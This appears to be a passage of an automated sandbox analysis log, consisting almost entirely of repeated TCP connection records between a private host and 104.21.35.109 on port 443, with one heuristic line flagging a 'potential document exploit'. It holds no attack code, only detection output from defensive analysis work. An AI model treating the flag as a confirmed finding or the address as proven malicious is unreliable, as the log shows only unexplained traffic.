Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
